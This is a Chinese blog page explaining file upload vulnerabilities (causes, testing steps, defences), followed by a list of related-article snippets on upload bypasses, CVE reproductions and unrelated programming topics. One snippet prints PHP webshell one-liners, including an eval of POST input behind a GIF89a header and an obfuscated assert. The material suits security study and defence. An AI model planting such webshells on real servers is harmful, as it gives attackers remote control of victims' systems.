santt
santt

文件上传漏洞

原理

一些web应用程序中允许上传图片,文本或者其他资源到指定的位置,文件上传漏洞就是利用这些可以上传的地方将恶意代码植入到服务器中,再通过url去访问以执行代码。

漏洞起因

  1. 对于上传文件的后缀名没有做严格的限制
  2. 对于上传文件的MIMETYPE没有做检查
  3. 没有限制上传的文件的文件权限
  4. 对于上传文件或者指定目录的行为没有做限制

漏洞测试过程

  1. 正常上传,抓包分析
  2. 尝试上传不同类型的恶意脚本文件(jsp、php等)
  3. 查看是否在前端做了上传限制,如大小、格式、并尝试绕过
  4. 利用报错或者猜测等方式获得木马路径
  5. 访问

防御措施

  1. 文件扩展名服务端白名单校验
  2. 文件内容服务端校验
  3. 上传文件重命名
  4. 隐藏上传文件路径

你可能感兴趣的:(文件上传漏洞)

  • 【代码审计】安全审核常见漏洞修复策略 秋说 Java代码审计网络安全代码审计
    文章目录1.异常信息泄露修复建议不推荐用法推荐用法2.文件上传漏洞错误示例(缺乏校验)安全示例(含格式/扩展名校验)3.SQL注入漏洞(MyBatis${})示例修复建议4.生成组件间接依赖生成依赖树建议5.间接依赖组件的漏洞什么是间接依赖后端修复1后端修复2前端修复1前端修复26.XSS(跨站脚本攻击)错误示例(存在风险)安全示例(自动转义)修复建议7.接口未鉴权修复建议8.路径遍历漏洞错误示例
  • 管家婆订货易在线商城 VshopProcess 任意文件上传漏洞复现 0xSecl 漏洞复现v1安全web安全
    0x01产品简介管家婆订货易,帮助传统企业构建专属的订货平台,PC+微信+APP+小程序+h5商城5网合一,无缝对接线下的管家婆ERP系统,让用户订货更高效。支持业务员代客下单,支持多级推客分销,以客带客,拓展渠道。让企业的生意更轻松。0x02漏洞概述管家婆订货易在线商城VshopProcess.ashx接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过该漏洞,上传恶意后门文件,深入利用可造
  • Java安全防线 第一篇:SQL注入 - 你的数据库正在“裸奔“吗? 全息架构师 安全数据库java
    Java安全防线:从漏洞原理到防御实战文章规划SQL注入:你的数据库正在"裸奔"吗?XSS攻击:当你的网站变成黑客的"提线木偶"CSRF漏洞:用户为何在"梦游"中完成交易?文件上传漏洞:黑客的"特洛伊木马"如何潜入XXE漏洞:XML解析如何成为系统后门反序列化漏洞:Java对象的"变身术"攻击SSRF漏洞:内网如何被"隔山打牛"RCE漏洞:系统命令执行的"死亡调用"JNDI注入:LDAP查询如何成
  • 2025年渗透测试面试题总结-奇安信[实习]安全服务工程师(题目+回答) 独行soc 2025年渗透测试面试指南面试职场和发展安全linuxweb安全渗透测试
    安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录奇安信[实习]安全服务工程师1.MVC框架2.SQL注入3.XSS与CSRF的区别4.CSRF原理与防范5.其他擅长领域6.XXE(XML外部实体)原理7.XXE相关函数(PHP示例)8.文件上传漏洞9.常见Web容器10.Apache7.0文件上传黑名单绕过11.密码学
  • Emlog Pro 任意文件上传漏洞(CVE-2023-44974) Point13reak CVE复现网络安全安全系统安全web安全
    靶机地址前来挑战!应急响应靶机训练-Web1漏洞原理/admin/plugin.php中存在任意文件上传漏洞使得攻击者能够通过上传构建的PHP文件来执行任意代码漏洞利用webshell上传(PHP木马)影响版本EmlogPro2.2.0修复方案更新当前系统或软件至最新版漏洞复现&#
  • 文件上传漏洞—服务端检测&绕过方法总结(持续更新) the zl Web安全—漏洞学习web安全安全前端
    Web安全—文件上传漏洞文件上传漏洞简介和原理可参考Web安全—文件上传漏洞此篇文章,本文仅对服务端检测方法和绕过方法进行总结服务端检测方法&绕过方法:检测方法一:前端JS检测(通常为检测文件扩展名)绕过方法:1,禁止Web浏览器加载JS代码2,修改前端代码,添加需要上传的脚本语言扩展名3,Burpsuite抓包修改filename参数检测方法二:服务端MIME类型检测(检测POST内容的Cont
  • 【HW系列】—SQL注入、XSS、文件上传流量特征 枷锁—sha 蓝队—应急响应网络安全sqlxss数据库web安全安全
    本文仅用于技术研究,禁止用于非法用途。文章目录SQL注入漏洞的流量特征及检测方法一、语法结构异常特征二、参数值异常特征三、请求行为异常特征四、编码与混淆特征五、数据库指纹特征XSS漏洞的流量特征分析一、请求流量特征二、响应流量特征三、行为特征与上下文关联四、攻击类型差异特征五、检测与防御建议文件上传漏洞的流量特征解析一、请求结构特征二、内容载荷特征三、行为模式特征四、防御与检测建议五、典型案例分析
  • 文件上传漏洞介绍 Pudding_2024 安全
    简介文件上传漏洞在现代互联网的web应用程序中,上传文件是一种常见的功能,因为它有助于提高业务效率,比如社交网站中,允许用户上传图片、视频、头像和许多其他类型的文件。然而向用户提供的功能越多,web应用受到攻击的风险就越大。如果web应用存在文件上传漏洞,那么恶意用户就可以利用文件上传漏洞将可执行脚本程序上传到服务器中,获取网站的权限,或者进一步危害服务器。为什么文件上传存在漏洞?上传文件时,如果
  • 文件上传/读取/包含漏洞技术说明 Alfadi联盟 萧瑶 网络安全文件/上传/读取/包含网络安全
    免责声明:本文所述技术仅供教育研究及安全防御参考,严禁用于任何非法用途。未经授权的网络攻击行为违反法律法规,后果自负。一、文件上传漏洞漏洞概述:文件上传漏洞源于未对用户上传的文件进行严格校验,攻击者可上传恶意文件(如Webshell)至服务器,导致服务器被控制、数据泄露等危害。常见绕过技术:1.MIMETYPE绕过-原理:服务端仅校验HTTP头的Content-Type(如image/jpeg),
  • 从0到1——CTFer成长之路(三) youngerll 从0到1——CTFer成长之路安全hadoop信息安全shell
    从0到1——CTFer成长之路(三)SSRF漏洞SSRFTraining命令执行漏洞死亡ping命令XSS的魔力XSS闯关web文件上传漏洞文件上传第二章web进阶SSRF漏洞SSRFTraining命令执行漏洞死亡ping命令XSS的魔力XSS闯关web文件上传漏洞文件上传
  • 文件上传漏洞学习记录——js绕过方法 轻舟行7 文件上传漏洞javascriptweb安全前端php
    js绕过方法按F12查看元素,把校验的上传文件后缀名文件删除(或在浏览器禁用js),即可上传。对于js来说这样还算简便,但burp抓包仍然为后续更常用的手段把恶意文件改成js允许上传的文件后缀,如jpg、gif、png等,再通过burpsuite抓取post的数据包,把后缀名改成可执行的脚本后缀如php、asp、jsp、net等。即可绕过上传。抓包修改后缀名js前端检测原理在文件上传时,用户选择文
  • CNVD-2020-10487复现(Apache Tomcat文件包含漏洞) afei00123 #漏洞复现
    目录1.漏洞概述2.影响范围3.风险等级4.漏洞复现4.1.tomcat环境搭建4.2.POC利用测试5.POC分析6.配合文件上传漏洞拿shell7.修复建议8.漏洞链接1.漏洞概述2020年2月20日,国家信息安全漏洞共享平台(CNVD)发布了ApacheTomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于TomcatAJP协议存在缺陷造成的。攻
  • 文件上传漏洞4 jonhswei 安全学习
    一、文件上传漏洞1.文件上传漏洞六大关1)文件上传漏洞之第六关第六关和第四关源码对比黑名单机制:第六关依然采用黑名单机制,禁用了包括".php"、".php5"、".php4"、".php3"、".htaccess"等扩展名。关键差异:与第四关相比,第六关源码缺少了将扩展名统一转换为小写的处理步骤(fileext=strtolower(file_ext=strtolower(fileext=s
  • 小迪安全学习笔记--第20天:web漏洞-文件上传之基础及过滤方式 铁锤2号 web安全自学笔记安全前端web安全
    cms漏洞一般是直接利用就可以了编辑器漏洞是针对网站中的编辑器的,编辑器存在漏洞,针对编辑器进行攻击什么是文件上传漏洞文件上传漏洞是指由于开发人员未对上传的文件进行严格的验证和过滤,而导致的用户可以越过其本身权限向服务器上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么
  • WEB安全--文件上传漏洞--36C3 CTF includer bypass 神经毒素 web安全linux安全
    内容的文件,也就是说tmp文件需要在这两种文件之间疯狂切换。compress.zlib://流封装器(StreamWrapper),用于直接对文件进行Zlib压缩或解压缩读写操作。不过了解了php底层对这个功能的描述后,发现我们可以用它创建包含任意内容的临时文件:PHPAPIint_php_stream_make_seekable(php_stream*origstream,php_stream*
  • 文件上传+一句话木马(图文学习笔记) 0_0qx 1024程序员节安全php
    文件上传+一句话木马(学习笔记)漏洞描述文件上传漏洞是指一些web应用程序中允许上传文本或其他指定资源到指定位置,上传漏洞顾名思义,就是攻击者上传了一个可执行文件如木马,病毒,恶意脚本,WebShell等到服务器执行,并最终获得网站控制权限的高危漏洞。(摘自百度搜索)例如有一个网站会出现以下的操作让其上传文件等,可利用上传文件过滤不严谨来插入木马等。一句话木马以PHP举例eval()函数表示括号内
  • 文件上传漏洞 ALe要立志成为web糕手 安全web安全网络安全
    文件上传漏洞服务端代码未对客户端上传的文件进行严格的验证,导致漏洞。非法用户可以利用上传的恶意文件控制整个网站,这个恶意文件被称为webshell,也可以称为一种网页后门。1、常见的WebShell有哪些?拥有较完整功能的webshell,我们一般称为大马。功能简易的webshell称为小马。除此之外还存在一句话木马、菜刀马、脱库马等等的名词,是对于webShell功能或者特性的简称。将这个保存在
  • WEB安全--文件上传漏洞--白名单绕过 神经毒素 文件上传漏洞web安全安全
    一、MIME类型(Content-Type)绕过原理:在我们不能绕过白名单后缀限制时,如果后端检测的是文件类型(数据包中的Content-Type字段),那我们可以利用合法类型替换示例:在上传,php后缀文件时抓包,将数据包中Content-Type:后对应的值修改为合法文件类型。.phpContent-type:application/x-httpd-php.pngContent-type:im
  • 某智慧医养服务平台Uploads存在任意文件上传漏洞(DVB-2025-8968) Byp0ss403 漏洞复现集合文件上传web安全
    免责声明本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。0x01产品介绍广西金中软件集团有限公司前身成立于1999年,隶属于广西电信下的三产公司金中信息产业有限公司,是一家集软件开发、网站建设、网络工程、系统
  • 文件上传漏洞总结(含原因+防御措施)+白名单+黑名单+内容、头+解析漏洞/修补方案 南部余额 漏洞总结安全漏洞web安全安全
    文件上传漏洞简单总结+白名单+黑名单+内容、头+解析漏洞/修补方案问题什么是文件上传漏洞?危害?防御措施?文件上传(验证/绕过)措施?前端js类绕过?后端黑名单绕过特殊解析后缀.htaccess解析大小写绕过点绕过空格绕过::$DATA绕过配合解析漏洞(*待补充)双后缀名绕过白名单绕过MIME绕过%00截断0x00截断0x0a截断内容及其他绕过?文件头检测二次渲染条件竞争突破getimagesiz
  • 探索网络安全:浅析文件上传漏洞 做梦都在改BUG web安全php安全网络安全
    在数字化时代,网络安全已成为我们每个人都需要关注的重要议题。无论是个人隐私保护,还是企业数据安全,网络威胁无处不在。了解网络安全的基本知识和防护措施,对我们每个人来说都至关重要。网络安全网络安全并非只是对网络做一层防护,而是指保护网络空间的安全,包括硬件、软件、数据和网络本身的安全。随着互联网的普及,我们的个人信息、财产安全乃至国家安全都与网络安全息息相关。网络安全不仅仅是技术问题,更是意识问题。
  • 深入探索文件上传基础及过滤方式:Web 安全的关键防线 阿贾克斯的黎明 网络安全web安全
    目录深入探索文件上传基础及过滤方式:Web安全的关键防线文件上传基础文件上传的安全风险文件上传的过滤方式在Web应用程序的安全领域中,文件上传功能是一把双刃剑。它为用户提供了极大的便利,比如用户可以上传头像、文档等各类文件,但同时也给Web应用带来了诸多安全风险。恶意用户可能利用文件上传漏洞,上传恶意脚本文件,进而获取服务器权限,导致敏感信息泄露、网站被篡改等严重后果。因此,深入了解文件上传基础及
  • 【网络安全】测试文件上传漏洞的 5 种高级方法 秋说 web安全文件上传漏洞挖掘
    未经许可,不得转载。文章目录正文01、PHPdisabled_functions02、通过文件上传进行路径遍历03、更改目录配置04、上传存储型XSS和XXE负载04-104-204-305、ZIPSlip正文本文将介绍不太传统的文件上传漏洞。01、PHPdisabled_functions很多时候,我们将一些PHP文件上传到目标应用程序,但却无法使用它们。原因通常是因为.ini文件中的PHP功能
  • phpcms v9文件上传漏洞复现 熬夜且瞌睡 网络php开发语言
    1.压缩包文件无递归删除$file=$_FILES['file'];#检查文件是否为空文件if(!$file){exit("请勿上传空文件");}$name=$file['name'];$dir='upload/';$ext=strtolower(substr(strrchr($name,'.'),1));functioncheck_dir($dir)#检查文件格式{$handle=opendir
  • 青少年编程与数学 02-009 Django 5 Web 编程 23课题、安全性 明月看潮生 编程与数学第02阶段青少年编程django编程与数学python网络安全
    青少年编程与数学02-009Django5Web编程23课题、安全性一、安全性安全性的定义安全性的关键方面安全性的实现方法安全性的挑战安全性的最佳实践二、安全漏洞1.注入漏洞2.跨站脚本(XSS)漏洞3.跨站请求伪造(CSRF)漏洞4.不安全的认证和会话管理5.安全配置错误6.不安全的反序列化7.使用含有已知漏洞的组件8.文件上传漏洞9.缓存区溢出10.信息泄露防范措施三、Django项目的安全性
  • 文件上传漏洞常用payload Werqy3 web安全安全
    [极客大挑战2019]UploadGIF89a@eval($_POST[1]);GIF89a$a="a"."s";$b="s"."e"."r"."t";$c=$a.$b;$c($_POST["1"]);
  • 网络安全组织架构表 网络安全技术架构 网络安全King web安全架构安全
    web安全架构(上)开始之前这们说一下,web网站其实防御也相当重要,不管是服务器防御,后台数据防御,数据库防御都是必须滴,那我们说说常见的几种。后续再给大家分享api接口安全性设计,黑名单白名单,以及防御DDOS。XSS攻击,SQL注入,防盗链,csrf模拟请求,文件上传漏洞,忘记密码漏洞,Api接口幂等,其他问题等等,,,,,,一,什么是XSS?Xss就是javascript脚本攻击,就是在表
  • 文件包含漏洞和上传漏洞 小高写BUG 渗透测试phpsql数据库渗透测试web安全
    文章目录文件包含漏洞PHP文件包含漏洞远程文件包含漏洞截断包含JSP文件包含文件包含漏洞预防文件上传漏洞解析漏洞服务端检测目录验证文件内容检测预防方法一句话木马sql注入,有sql盲注,基于布尔的注入,还有基于时间的注入,union的使用条件字段数保持一致,可以用其他数据凑数补上。文件包含漏洞PHP文件包含漏洞文件包含:共用函数写到单个文件中,然后多次调用,文件包含漏洞:包含的文件可以被替换成恶意
  • Apache Tomcat 漏洞CVE-2024-50379条件竞争文件上传漏洞 servlet readonly spring boot 修复方式 李三醒 apachetomcatspringboot
    1,关于漏洞ApacheTomcat是一个流行的开源Web服务器和JavaServlet容器。二、漏洞描述ApacheTomcat中修复了个TOCTOU竞争条件远程代码执行漏洞(CVE-2024-50379),该漏洞的CVSS评分为9.8。ApacheTomcat中JSP编译期间存在检查时间使用时间(TOCTOU)竞争条件漏洞,当ApacheTomcat的默认servlet被配置为允许写入(即re
  • BUUCTF--[HarekazeCTF2019]Avatar Uploader 1 Uzero.
    name随便输一个,进入之后看到是让上传头像,这个应该是一个文件上传漏洞接下来分析所给的源码256000){error('Uploadedfileistoolarge.');}//checkfiletype$finfo=finfo_open(FILEINFO_MIME_TYPE);$type=finfo_file($finfo,$_FILES['file']['tmp_name']);finfo_
  • springmvc 下 freemarker页面枚举的遍历输出 杨白白 enumfreemarker
    spring mvc freemarker 中遍历枚举 1枚举类型有一个本地方法叫values(),这个方法可以直接返回枚举数组。所以可以利用这个遍历。 enum public enum BooleanEnum { TRUE(Boolean.TRUE, "是"), FALSE(Boolean.FALSE, "否");
  • 实习简要总结 byalias 工作
    来白虹不知不觉中已经一个多月了,因为项目还在需求分析及项目架构阶段,自己在这段 时间都是在学习相关技术知识,现在对这段时间的工作及学习情况做一个总结: (1)工作技能方面 大体分为两个阶段,Java Web 基础阶段和Java EE阶段 1)Java Web阶段 在这个阶段,自己主要着重学习了 JSP, Servlet, JDBC, MySQL,这些知识的核心点都过 了一遍,也
  • Quartz——DateIntervalTrigger触发器 eksliang quartz
    转载请出自出处:http://eksliang.iteye.com/blog/2208559 一.概述 simpleTrigger 内部实现机制是通过计算间隔时间来计算下次的执行时间,这就导致他有不适合调度的定时任务。例如我们想每天的 1:00AM 执行任务,如果使用 SimpleTrigger,间隔时间就是一天。注意这里就会有一个问题,即当有 misfired 的任务并且恢复执行时,该执行时间
  • Unix快捷键 18289753290 unixUnix;快捷键;
    复制,删除,粘贴: dd:删除光标所在的行                             &nbs
  • 获取Android设备屏幕的相关参数 酷的飞上天空 android
    包含屏幕的分辨率  以及 屏幕宽度的最大dp 高度最大dp   TextView text = (TextView)findViewById(R.id.text); DisplayMetrics dm = new DisplayMetrics(); text.append("getResources().ge
  • 要做物联网?先保护好你的数据 蓝儿唯美 数据
    根据Beecham Research的说法,那些在行业中希望利用物联网的关键领域需要提供更好的安全性。 在Beecham的物联网安全威胁图谱上,展示了那些可能产生内外部攻击并且需要通过快速发展的物联网行业加以解决的关键领域。 Beecham Research的技术主管Jon Howes说:“之所以我们目前还没有看到与物联网相关的严重安全事件,是因为目前还没有在大型客户和企业应用中进行部署,也就
  • Java取模(求余)运算 随便小屋 java
            整数之间的取模求余运算很好求,但几乎没有遇到过对负数进行取模求余,直接看下面代码: /** * * @author Logic * */ public class Test { public static void main(String[] args) { // TODO A
  • SQL注入介绍 aijuans sql注入
    二、SQL注入范例 这里我们根据用户登录页面 <form action="" > 用户名:<input type="text" name="username"><br/> 密 码:<input type="password" name="passwor
  • 优雅代码风格 aoyouzi 代码
    总结了几点关于优雅代码风格的描述: 代码简单:不隐藏设计者的意图,抽象干净利落,控制语句直截了当。 接口清晰:类型接口表现力直白,字面表达含义,API 相互呼应以增强可测试性。 依赖项少:依赖关系越少越好,依赖少证明内聚程度高,低耦合利于自动测试,便于重构。 没有重复:重复代码意味着某些概念或想法没有在代码中良好的体现,及时重构消除重复。 战术分层:代码分层清晰,隔离明确,
  • 布尔数组 百合不是茶 java布尔数组
      androi中提到了布尔数组;   布尔数组默认的是false,  并且只会打印false或者是true   布尔数组的例子;  根据字符数组创建布尔数组 char[] c = {'p','u','b','l','i','c'}; //根据字符数组的长度创建布尔数组的个数 boolean[] b = new bool
  • web.xml之welcome-file-list、error-page bijian1013 javaweb.xmlservleterror-page
    welcome-file-list 1.定义: <welcome-file-list> <welcome-file>login.jsp</welcome> </welcome-file-list>  2.作用:用来指定WEB应用首页名称。   error-page1.定义: <error-page&g
  • richfaces 4 fileUpload组件删除上传的文件 sunjing clearRichfaces 4fileupload
     页面代码               <h:form id="fileForm">            <rich:
  • 技术文章备忘 bit1129 技术文章
    Zookeeper http://wenku.baidu.com/view/bab171ffaef8941ea76e05b8.html http://wenku.baidu.com/link?url=8thAIwFTnPh2KL2b0p1V7XSgmF9ZEFgw4V_MkIpA9j8BX2rDQMPgK5l3wcs9oBTxeekOnm5P3BK8c6K2DWynq9nfUCkRlTt9uV
  • org.hibernate.hql.ast.QuerySyntaxException: unexpected token: on near line 1解决方案 白糖_ Hibernate
    文章摘自:http://blog.csdn.net/yangwawa19870921/article/details/7553181   在编写HQL时,可能会出现这种代码: select a.name,b.age from TableA a left join TableB b on a.id=b.id  如果这是HQL,那么这段代码就是错误的,因为HQL不支持
  • sqlserver按照字段内容进行排序 bozch 按照内容排序
    在做项目的时候,遇到了这样的一个需求:           从数据库中取出的数据集,首先要将某个数据或者多个数据按照地段内容放到前面显示,例如:从学生表中取出姓李的放到数据集的前面;          select * fro
  • 编程珠玑-第一章-位图排序 bylijinnan java编程珠玑
    import java.io.BufferedWriter; import java.io.File; import java.io.FileWriter; import java.io.IOException; import java.io.Writer; import java.util.Random; public class BitMapSearch {
  • Java关于==和equals chenbowen00 java
    关于==和equals概念其实很简单,一个是比较内存地址是否相同,一个比较的是值内容是否相同。虽然理解上不难,但是有时存在一些理解误区,如下情况: 1、 String a = "aaa"; a=="aaa"; ==> true 2、 new String("aaa")==new String("aaa
  • [IT与资本]软件行业需对外界投资热情保持警惕 comsci it
          我还是那个看法,软件行业需要增强内生动力,尽量依靠自有资金和营业收入来进行经营,避免在资本市场上经受各种不同类型的风险,为企业自主研发核心技术和产品提供稳定,温和的外部环境...       如果我们在自己尚未掌握核心技术之前,企图依靠上市来筹集资金,然后使劲往某个领域砸钱,然
  • oracle 数据块结构 daizj oracle数据块块结构行目录
    oracle 数据块是数据库存储的最小单位,一般为操作系统块的N倍。其结构为: 块头--〉空行--〉数据,其实际为纵行结构。 块的标准大小由初始化参数DB_BLOCK_SIZE指定。具有标准大小的块称为标准块(Standard Block)。块的大小和标准块的大小不同的块叫非标准块(Nonstandard Block)。同一数据库中,Oracle9i及以上版本支持同一数据库中同时使用标
  • github上一些觉得对自己工作有用的项目收集 dengkane github
    github上一些觉得对自己工作有用的项目收集 技能类 markdown语法中文说明 回到顶部 全文检索 elasticsearch bigdesk elasticsearch管理插件 回到顶部 nosql mapdb 支持亿级别map, list, 支持事务. 可考虑做为缓存使用 C
  • 初二上学期难记单词二 dcj3sjt126com englishword
    dangerous 危险的 panda 熊猫 lion 狮子 elephant 象 monkey 猴子 tiger 老虎 deer 鹿 snake 蛇 rabbit 兔子 duck 鸭 horse 马 forest 森林 fall 跌倒;落下 climb 爬;攀登 finish 完成;结束 cinema 电影院;电影 seafood 海鲜;海产食品 bank 银行
  • 8、mysql外键(FOREIGN KEY)的简单使用 dcj3sjt126com mysql
    一、基本概念 1、MySQL中“键”和“索引”的定义相同,所以外键和主键一样也是索引的一种。不同的是MySQL会自动为所有表的主键进行索引,但是外键字段必须由用户进行明确的索引。用于外键关系的字段必须在所有的参照表中进行明确地索引,InnoDB不能自动地创建索引。 2、外键可以是一对一的,一个表的记录只能与另一个表的一条记录连接,或者是一对多的,一个表的记录与另一个表的多条记录连接。 3、如
  • java循环标签 Foreach shuizhaosi888 标签java循环foreach
    1. 简单的for循环 public static void main(String[] args) { for (int i = 1, y = i + 10; i < 5 && y < 12; i++, y = i * 2) { System.err.println("i=" + i + " y="
  • Spring Security(05)——异常信息本地化 234390216 exceptionSpring Security异常信息本地化
    异常信息本地化          Spring Security支持将展现给终端用户看的异常信息本地化,这些信息包括认证失败、访问被拒绝等。而对于展现给开发者看的异常信息和日志信息(如配置错误)则是不能够进行本地化的,它们是以英文硬编码在Spring Security的代码中的。在Spring-Security-core-x
  • DUBBO架构服务端告警Failed to send message Response javamingtingzhao 架构DUBBO
     废话不多说,警告日志如下,不知道有哪位遇到过,此异常在服务端抛出(服务器启动第一次运行会有这个警告),后续运行没问题,找了好久真心不知道哪里错了。    WARN 2015-07-18 22:31:15,272 com.alibaba.dubbo.remoting.transport.dispatcher.ChannelEventRunnable.run(84)
  • JS中Date对象中几个用法 leeqq JavaScriptDate最后一天
    近来工作中遇到这样的两个需求 1. 给个Date对象,找出该时间所在月的第一天和最后一天 2. 给个Date对象,找出该时间所在周的第一天和最后一天   需求1中的找月第一天很简单,我记得api中有setDate方法可以使用 使用setDate方法前,先看看getDate var date = new Date(); console.log(date); // Sat J
  • MFC中使用ado技术操作数据库 你不认识的休道人 sqlmfc
    1.在stdafx.h中导入ado动态链接库 #import"C:\Program Files\Common Files\System\ado\msado15.dll" no_namespace rename("EOF","end")2.在CTestApp文件的InitInstance()函数中domodal之前写::CoIniti
  • Android Studio加速 rensanning android studio
    Android Studio慢、吃内存!启动时后会立即通过Gradle来sync & build工程。 (1)设置Android Studio a) 禁用插件 File -> Settings...  Plugins 去掉一些没有用的插件。 比如:Git Integration、GitHub、Google Cloud Testing、Google Cloud
  • 各数据库的批量Update操作 tomcat_oracle javaoraclesqlmysqlsqlite
    MyBatis的update元素的用法与insert元素基本相同,因此本篇不打算重复了。本篇仅记录批量update操作的 sql语句,懂得SQL语句,那么MyBatis部分的操作就简单了。   注意:下列批量更新语句都是作为一个事务整体执行,要不全部成功,要不全部回滚。 MSSQL的SQL语句  WITH R AS(   SELECT 'John' as name, 18 as
  • html禁止清除input文本输入缓存 xp9802 input
    多数浏览器默认会缓存input的值,只有使用ctl+F5强制刷新的才可以清除缓存记录。如果不想让浏览器缓存input的值,有2种方法: 方法一: 在不想使用缓存的input中添加 autocomplete="off"; eg: <input type="text" autocomplete="off" name
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他